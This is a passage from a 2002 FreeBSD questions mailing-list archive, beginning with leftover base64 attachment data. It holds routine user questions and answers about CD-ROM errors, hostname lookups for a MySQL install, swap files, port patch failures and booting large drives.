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 ------=_NextPart_000_0022_01C217D4.8D47E540-- _______________________________________________ Publicidad mailing list Publicidad@sonimag.net http://thor.sonimag.net/mailman/listinfo/publicidad To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 1: 1:15 2002 Delivered-To: freebsd-questions@freebsd.org Received: from web14610.mail.yahoo.com (web14610.mail.yahoo.com [216.136.224.242]) by hub.freebsd.org (Postfix) with SMTP id 151D137B401 for ; Sun, 23 Jun 2002 01:01:12 -0700 (PDT) Message-ID: <20020623080111.98048.qmail@web14610.mail.yahoo.com> Received: from [63.198.239.128] by web14610.mail.yahoo.com via HTTP; Sun, 23 Jun 2002 01:01:11 PDT Date: Sun, 23 Jun 2002 01:01:11 -0700 (PDT) From: Thomas Villarubia Subject: Help! Need installation assistance To: freebsd-questions@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello; I am attempting to install FreeBSD 4.4 on a brand new hard drive. However, after several attempted installs I am unable to succed in this effort. I am new to Unix and the reason that I chose free BSD is because of the alleged ease of install. The install fails when attempting to transfer files from the CDROM to my hard drive. I receive the following messages. "unable to transfer (bin,doc,man) from acd0c" and "Write failure on transfer" Im sure there is a fix for this but due to my limited experience with Unix I cant seem to figure it out. Can you help me with this problem. I am really excited about getting the OS up and running so I can further my pursuit on learning Unix. Thank you in advance for your assistance. Thomas Villarubia __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 1:10:35 2002 Delivered-To: freebsd-questions@freebsd.org Received: from www2.mailru.com (www2.mailru.com [80.68.244.5]) by hub.freebsd.org (Postfix) with ESMTP id 13C5E37B400 for ; Sun, 23 Jun 2002 01:10:32 -0700 (PDT) Received: from lamoz (ppp-027.dialup.ipc.ru [193.178.159.27]) (authenticated bits=0) by www2.mailru.com (8.12.1/8.12.1) with ESMTP id g5N87X4I056480 for ; Sun, 23 Jun 2002 12:07:35 +0400 (MSD) (envelope-from lamoz@mailru.com) Date: Sun, 23 Jun 2002 12:10:45 +0400 From: "[.lamoz]" To: freebsd-questions@freebsd.org Subject: my cd-rom goes mad. Message-Id: <20020623121045.4a1deae1.lamoz@mailru.com> X-Mailer: Sylpheed version 0.7.6claws (GTK+ 1.2.10; i386-portbld-freebsd4.5) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG After updatinf fbsd from 4.5R to 4.6S i can't access any file on cd-rom. Cd-rom mounts successful, but when i'm trying to copy or read file i gor *error message*, and it repeates until i reboot PC. Please help me. In all newsgroups(russian ones) i didn't got any answer. +((( P.S. please also send answer to my mail in Cc... ---------- uname ----------- lamoz# uname -a FreeBSD lamoz.home.net 4.6-STABLE FreeBSD 4.6-STABLE #0: Fri Jun 21 05:00:36 MSD 2002 root@lamoz.home.net:/usr/obj/usr/src/sys/GENERAL i386 -------- dmes info --------- atapci0: port 0xf000-0xf00f at device 7.1 on pci0 ata0: at 0x1f0 irq 14 on atapci0 ata1: at 0x170 irq 15 on atapci0 ad0: 9768MB [19846/16/63] at ata0-master UDMA66 ad1: 39093MB [79428/16/63] at ata0-slave UDMA66 ad3: 2014MB [4092/16/63] at ata1-slave UDMA33 acd0: CD-RW at ata1-master PIO3 ------ error message ------- Jun 21 14:18:24 lamoz /kernel: acd0: READ_BIG command timeout - resetting Jun 21 14:18:24 lamoz /kernel: acd0: READ_BIG command timeout - resetting Jun 21 14:18:24 lamoz /kernel: ata1: resetting devices .. done Jun 21 14:18:24 lamoz /kernel: ata1: resetting devices .. done -------- some info --------- CD-ROM: Mitsumi 4804-TE ----------- end ------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 1:21:22 2002 Delivered-To: freebsd-questions@freebsd.org Received: from fisk246150.public.northwestern.edu (fisk246150.public.northwestern.edu [129.105.246.150]) by hub.freebsd.org (Postfix) with ESMTP id 06AAE37B400 for ; Sun, 23 Jun 2002 01:21:15 -0700 (PDT) Received: from fisk246150.public.northwestern.edu (localhost [127.0.0.1]) by fisk246150.public.northwestern.edu (8.12.3/8.12.3) with ESMTP id g5N8CDcu023767; Sun, 23 Jun 2002 03:12:13 -0500 (CDT) (envelope-from possum@fisk246150.public.northwestern.edu) Received: (from possum@localhost) by fisk246150.public.northwestern.edu (8.12.3/8.12.3/Submit) id g5N8CDoq023653; Sun, 23 Jun 2002 03:12:13 -0500 (CDT) Date: Sun, 23 Jun 2002 03:12:12 -0500 From: Redmond Militante To: Jon Noack Cc: freebsd-questions@freebsd.org Subject: Re: problem installing mysql323-server from ports Message-ID: <20020623031212.A11462@darkpossum> Reply-To: Redmond Militante References: <20020622232907.A11042@darkpossum> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="5vNYLRcllDrimb99" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: ; from noackjr@compgeek.com on Sun, Jun 23, 2002 at 12:35:30AM -0500 X-Sender: redmond@darkpossum.medill.northwestern.edu X-URL: http://darkpossum.medill.northwestern.edu/modules.php?name=Content&pa=showpage&pid=3 X-DSS-PGP-Fingerprint: F9E7 AFEA 0209 B164 7F83 E727 5213 FAFA 1511 7836 X-Tofu: The other white meat substitute. Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --5vNYLRcllDrimb99 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 hi thanks for helping me out. On Sun, Jun 23, 2002 at 12:35:30AM -0500, Jon Noack expatiated with great p= erspicuity: > > Sorry, the host 'fisk246150' could not be looked up. > > i type 'hostname' and i get the correct hostname. > It would be nice if you told us what 'hostname' returns, but I will assume > your hostname is "fisk246150" based on the error above (or > fisk246150.your.domain). >=20 > > the first 2 lines in my /etc/hosts is > > ::1 localhost localhost.my.domain > > 127.0.0.1 localhost localhost.my.domain > Why do these lines matter? While they are necessary and correct, what you > need is an entry in hosts for "fisk246150". Something like: >=20 > BAD =3D 1.2.3.4 fisk246150.your.domain > GOOD =3D 1.2.3.4 fisk246150 fisk246150.your.domain >=20 > Actually, if you have a BAD entry, that could cause problems if the script > is using 'hostname -s', because it would trim the domain info off (to form > "fisk246150") and then try to look that up. That lookup would fail, beca= use > just "fisk246150" is not present in the hosts file and DNS will obviously > fail as well. changing my hosts file like you said did it. thanks >=20 > > i did an nslookup on myself and it gives me the > > right hostname. > Again, don't just tell us it's correct -- tell us something like "'nslook= up > fisk246150' correctly returns 1.2.3.4". That is actually helpful. As you > are having problems, anything you *think* is correct may not actually *be* > correct (or show symptoms of the true problem). Give us the raw data *an= d* > your interpretation -- that gives us the chance to get an objective view = of > the situation and see what you're thinking. This often allows us to corr= ect > the problem and give you pointers on how to approach problems in the futu= re. >=20 > The error was that it couldn't look up "fisk246150". Please send us the > output of the 'hostname' and 'nslookup' commands and something meaningful > from your hosts file (the localhost info is present on every FreeBSD box). >=20 > I definitely appreciate that you attempted to solve the problem before > posting to the list. I also understand that if you've been working for a > while that the little things seem insignificant and can be glossed over. > Try not to give in to that and post as much info as you can. >=20 yep. long day :) thanks again r. > Jon >=20 >=20 > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message >=20 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9FYLYFNjun16SvHYRAjBDAJ9Or1qkG41VkozvqFFUPjxzOvujWACghbnq OVHCJocQ5nSccrU8gTcMW2U=3D =3DOFJb -----END PGP SIGNATURE----- --5vNYLRcllDrimb99 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9FYLcFNjun16SvHYRAv8uAJ9S7RGGs+Qz64e55h3L8SOEPqXT+ACgi0l4 SkbT4W9hkSoU8Cwal7g0Bjc= =E6I/ -----END PGP SIGNATURE----- --5vNYLRcllDrimb99-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 1:42:39 2002 Delivered-To: freebsd-questions@freebsd.org Received: from sccrmhc02.attbi.com (sccrmhc02.attbi.com [204.127.202.62]) by hub.freebsd.org (Postfix) with ESMTP id E2D0337B400 for ; Sun, 23 Jun 2002 01:42:35 -0700 (PDT) Received: from [192.168.1.100] ([24.126.181.111]) by sccrmhc02.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020623084235.BOZB1547.sccrmhc02.attbi.com@[192.168.1.100]> for ; Sun, 23 Jun 2002 08:42:35 +0000 User-Agent: Microsoft-Entourage/9.0.2509 Date: Sun, 23 Jun 2002 01:43:48 -0700 Subject: [OFF] FreeBSD vs Solaris - Opinions? From: Steve Warwick To: Message-ID: Mime-version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi All, Sorry for the off topic post but I am interested to get some different opinions on the "which is better FreeBSD or Solaris?" topic. Everyone I know is pro Sun so I'm trying to get a balanced view. Actually, to clarify my situation: Which, in your opinion would make a better server. Sun UltrSparc 5 / 333mhz running Solaris (I got a great deal on a couple of machines) or a generic Athlon 1.2mhz running FreeBSD. [both machines have ATA drives & 256meg] Your thoughts and expert opinions welcomed, including the peripheral topics of support, usergroups etc. Thanks, Steve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 2:29:49 2002 Delivered-To: freebsd-questions@freebsd.org Received: from tierzero.apana.org.au (sa.apana.org.au [203.14.158.1]) by hub.freebsd.org (Postfix) with ESMTP id 05BBC37B401 for ; Sun, 23 Jun 2002 02:29:44 -0700 (PDT) Received: from there (dialup-13.pasa.apana.org.au [203.14.158.142]) by tierzero.apana.org.au (8.11.1/8.11.1) with SMTP id g5N9Tff04609 for ; Sun, 23 Jun 2002 18:59:41 +0930 (CST) (envelope-from bastill@sa.apana.org.au) Message-Id: <200206230929.g5N9Tff04609@tierzero.apana.org.au> Content-Type: text/plain; charset="iso-8859-1" From: Brian Astill Reply-To: bastill@sa.apana.org.au To: questions@FreeBSD.org Subject: Error in apsfilter port - confirmed Date: Sun, 23 Jun 2002 19:04:26 +0930 X-Mailer: KMail [version 1.3] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I earler posted: Here is the error I got just after cvsup; make and make install apsfilter. ===> Patching for netpbm-10.2 ===> Applying FreeBSD patches for netpbm-10.2 -e: not found *** Error code 127 Stop in /usr/ports/graphics/netpbm. *** Error code 1 Fix, anyone? ------------------------------------------- Just to be sure, I did another cvsup and tired make install again, with this result: ===> Patching for netpbm-10.2 ===> Applying FreeBSD patches for netpbm-10.2 Ignoring previously applied (or reversed) patch. 1 out of 1 hunks ignored--saving rejects to GNUmakefile.rej >> Patch patch-GNUmakefile failed to apply cleanly. *** Error code 1 I'd be really grateful for a fix or workaround, sio I have a working apsfilter. Thanks. -- Regards, Brian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 2:32: 4 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mta06-svc.ntlworld.com (mta06-svc.ntlworld.com [62.253.162.46]) by hub.freebsd.org (Postfix) with ESMTP id 8858737B401 for ; Sun, 23 Jun 2002 02:32:00 -0700 (PDT) Received: from lungfish.ntlworld.com ([80.4.0.215]) by mta06-svc.ntlworld.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020623093158.TMLQ4119.mta06-svc.ntlworld.com@lungfish.ntlworld.com>; Sun, 23 Jun 2002 10:31:58 +0100 Received: from tuatara.goatsucker.org (tuatara.goatsucker.org [192.168.1.6]) by lungfish.ntlworld.com (8.11.6/8.11.6) with ESMTP id g5N9VwV92350; Sun, 23 Jun 2002 10:31:58 +0100 (BST) (envelope-from scott@tuatara.goatsucker.org) Received: (from scott@localhost) by tuatara.goatsucker.org (8.12.3/8.12.3/Submit) id g5N9VvrY021579; Sun, 23 Jun 2002 10:31:57 +0100 (BST) (envelope-from scott) Date: Sun, 23 Jun 2002 10:31:57 +0100 From: Scott Mitchell To: Patrick Thomas Cc: freebsd-questions@FreeBSD.ORG Subject: Re: removing a swap file - just comment out in fstab ? Message-ID: <20020623103157.C359@fishballoon.dyndns.org> References: <20020622170628.Y68572-100000@utility.clubscholarship.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020622170628.Y68572-100000@utility.clubscholarship.com>; from root@utility.clubscholarship.com on Sat, Jun 22, 2002 at 05:07:53PM -0700 X-Operating-System: FreeBSD 4.6-STABLE i386 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sat, Jun 22, 2002 at 05:07:53PM -0700, Patrick Thomas wrote: > > I have two swap files. > > I want to disable one. My plan is to simply comment out the line for that > swap file in /etc/fstab, and then reboot. > > Will this work just fine, or am I missing some other details that also > need to be attended to in order to remove one of the swap files ? > > thanks, > > PT Commenting out for fstab line will work just fine. Scott -- =========================================================================== Scott Mitchell | PGP Key ID | "Eagles may soar, but weasels Cambridge, England | 0x54B171B9 | don't get sucked into jet engines" scott.mitchell@mail.com | 0xAA775B8B | -- Anon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 2:39:18 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp06.retemail.es (smtp06.iddeo.es [62.81.186.16]) by hub.freebsd.org (Postfix) with ESMTP id 426FC37B401 for ; Sun, 23 Jun 2002 02:39:13 -0700 (PDT) Received: from kodo.localdomain ([62.174.2.159]) by smtp06.retemail.es (InterMail vM.5.01.05.08 201-253-122-126-108-20020526) with SMTP id <20020623093911.SUUK8351.smtp06.retemail.es@kodo.localdomain> for ; Sun, 23 Jun 2002 11:39:11 +0200 Date: Sun, 23 Jun 2002 11:39:08 +0200 From: F.Xavier Noria To: freebsd-questions@FreeBSD.org Subject: Re: cannot build XFree86 4.2.x (more specific) Message-Id: <20020623113908.62c4c044.fxn@retemail.es> X-Mailer: Sylpheed version 0.7.8 (GTK+ 1.2.10; i386-portbld-freebsd4.5) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Well, finally this is running under 4.2.0, pkg_add -r worked. -- fxn To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 2:44:31 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mta01-svc.ntlworld.com (mta01-svc.ntlworld.com [62.253.162.41]) by hub.freebsd.org (Postfix) with ESMTP id EAD6C37B403 for ; Sun, 23 Jun 2002 02:44:23 -0700 (PDT) Received: from lungfish.ntlworld.com ([80.4.0.215]) by mta01-svc.ntlworld.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020623094422.TZDH16050.mta01-svc.ntlworld.com@lungfish.ntlworld.com>; Sun, 23 Jun 2002 10:44:22 +0100 Received: from tuatara.goatsucker.org (tuatara.goatsucker.org [192.168.1.6]) by lungfish.ntlworld.com (8.11.6/8.11.6) with ESMTP id g5N9iLV92390; Sun, 23 Jun 2002 10:44:22 +0100 (BST) (envelope-from scott@tuatara.goatsucker.org) Received: (from scott@localhost) by tuatara.goatsucker.org (8.12.3/8.12.3/Submit) id g5N9iKRX021672; Sun, 23 Jun 2002 10:44:20 +0100 (BST) (envelope-from scott) Date: Sun, 23 Jun 2002 10:44:20 +0100 From: Scott Mitchell To: Andrew Cc: Bob Bomar , questions@FreeBSD.ORG Subject: Re: Booting off Large Drives Message-ID: <20020623104420.D359@fishballoon.dyndns.org> References: <20020623052232.GA18799@peitho.fxp.org> <20020623152518.C21207-100000@starbug.ugh.net.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020623152518.C21207-100000@starbug.ugh.net.au>; from andrew@ugh.net.au on Sun, Jun 23, 2002 at 03:26:28PM +1000 X-Operating-System: FreeBSD 4.6-STABLE i386 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sun, Jun 23, 2002 at 03:26:28PM +1000, Andrew wrote: > > > > If this was a BIOS problem, which I had a while ago with a 40 gig > > in a P166, then the BIOS would not even see the drive. > > Well that gives me hope :-) I might just try reformatting and seeing if it > goes away - perhaps I got a parameter wrong. > > Thanks, > > Andrew You're not trying to boot from a partition beyond the first 1024 cylinders of the disk, are you? A lot of older machines had issues with this (see Section 3 of the FAQ or grovel through the list archives -- it used to come up a lot). If this is the problem you might be able to work around it by tweaking the disk addressing options in the BIOS to change its idea of just how big the first 1024 cylinders are. You might end up needing to have small dedicated root partitions for both -stable and -current at the start of the disk for them both to be bootable. HTH, Scott -- =========================================================================== Scott Mitchell | PGP Key ID | "Eagles may soar, but weasels Cambridge, England | 0x54B171B9 | don't get sucked into jet engines" scott.mitchell@mail.com | 0xAA775B8B | -- Anon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 2:56:36 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp05.retemail.es (smtp05.iddeo.es [62.81.186.15]) by hub.freebsd.org (Postfix) with ESMTP id DC6A337B400 for ; Sun, 23 Jun 2002 02:56:26 -0700 (PDT) Received: from kodo.localdomain ([62.174.2.159]) by smtp05.retemail.es (InterMail vM.5.01.05.08 201-253-122-126-108-20020526) with SMTP id <20020623095622.SQRT22018.smtp05.retemail.es@kodo.localdomain> for ; Sun, 23 Jun 2002 11:56:22 +0200 Date: Sun, 23 Jun 2002 11:56:19 +0200 From: F.Xavier Noria To: freebsd-questions@FreeBSD.org Subject: CDROM not working after upgrade Message-Id: <20020623115619.42430069.fxn@retemail.es> X-Mailer: Sylpheed version 0.7.8 (GTK+ 1.2.10; i386-portbld-freebsd4.5) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG After upgrading to 4.6-RELEASE the CDROM has changed from /dev/acd0c to /dev/acd0a, and sysinstall does not find it, do you know what can be happened? How does sysintall looks for the CDROM when selected in the media list? -- fxn PS: dmesg says "acd0: CDROM at ata0-slave PIO4" in case it is relevant. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 2:57:15 2002 Delivered-To: freebsd-questions@freebsd.org Received: from law-cs1.hotmail.com (law-cs1.hotmail.com [209.185.130.56]) by hub.freebsd.org (Postfix) with ESMTP id DF26037B403 for ; Sun, 23 Jun 2002 02:57:07 -0700 (PDT) Received: (from root@localhost) by law-cs1.hotmail.com (8.9.3/8.9.3) id CAA26206 for questions@FreeBSD.ORG; Sun, 23 Jun 2002 02:57:07 -0700 (PDT) Date: Sun, 23 Jun 2002 02:57:07 -0700 (PDT) Message-Id: <200206230957.CAA26206@law-cs1.hotmail.com> From: MSN Hotmail To: questions@FreeBSD.ORG Subject: Account numbers MIME-Version: 1.0 X-Originating-IP: [209.185.130.56] Content-Type: TEXT/PLAIN; charset=iso-8859-1 Content-transfer-encoding: 8bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is an auto-generated response designed to answer your question as quickly as possible. Please note that you will not receive a reply if you respond directly to this message. We hope the directions below answer your question. If after following the directions your problem is still unresolved, please click the link to the Hotmail Customer Support form at the end of this message to submit your issue and a Customer Support Representative will help you. MSN Hotmail WebCourier is an online content delivery service that enables you to request that rich, graphical e-mail messages be delivered daily to your Inbox. Check regularly for additions because Hotmail constantly adds new titles to this list. For your convenience, we've divided current WebCourier services into these categories: - Business & Investing - Entertainment & Music - Games - Health & Fitness - News & Sports - Personal Interests - Shopping - Teens & Young Adults - Women >>> To subscribe to WebCourier 1. On the right navigation bar under "Hotmail Services", click the "Free Newsletters" link. The "WebCourier FREE Subscriptions" page appears. 2. Scroll down to see the list of possible subscriptions. 3. Select the check box next to each service to which you want to subscribe. 4. Click "OK" to subscribe to these services. >>> To unsubscribe from WebCourier 1. On the right navigation bar under "Hotmail Services", click the "Free Newsletters" link. The "WebCourier FREE Subscriptions" page appears. 2. Clear the check box next to each service to which you're subscribed. 3. Click "OK" to unsubscribe to these services. ************************* Still Didn't Solve Your Problem? Complete the Hotmail Customer Support request form at: http://www.hotmail.com/cgi-bin/support Remember that MSN Hotmail also has comprehensive online help available--just click "Help" in the upper right corner. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 3: 2:21 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mta01-svc.ntlworld.com (mta01-svc.ntlworld.com [62.253.162.41]) by hub.freebsd.org (Postfix) with ESMTP id 58F8F37B401 for ; Sun, 23 Jun 2002 03:02:11 -0700 (PDT) Received: from lungfish.ntlworld.com ([80.4.0.215]) by mta01-svc.ntlworld.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020623100210.UJDZ16050.mta01-svc.ntlworld.com@lungfish.ntlworld.com>; Sun, 23 Jun 2002 11:02:10 +0100 Received: from tuatara.goatsucker.org (tuatara.goatsucker.org [192.168.1.6]) by lungfish.ntlworld.com (8.11.6/8.11.6) with ESMTP id g5NA29V92452; Sun, 23 Jun 2002 11:02:09 +0100 (BST) (envelope-from scott@tuatara.goatsucker.org) Received: (from scott@localhost) by tuatara.goatsucker.org (8.12.3/8.12.3/Submit) id g5NA1tYQ021910; Sun, 23 Jun 2002 11:01:55 +0100 (BST) (envelope-from scott) Date: Sun, 23 Jun 2002 11:01:55 +0100 From: Scott Mitchell To: Peter Leftwich Cc: FreeBSD Questions LIST , XFree86 FreeBSD LIST , XFree86 LIST Subject: Re: I x-have x-amazing x-news! Message-ID: <20020623110155.E359@fishballoon.dyndns.org> References: <20020622214152.U561-100000@66-75-1-142.san.rr.com> Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="5mCyUwZo2JvN/JJP" Content-Disposition: inline User-Agent: 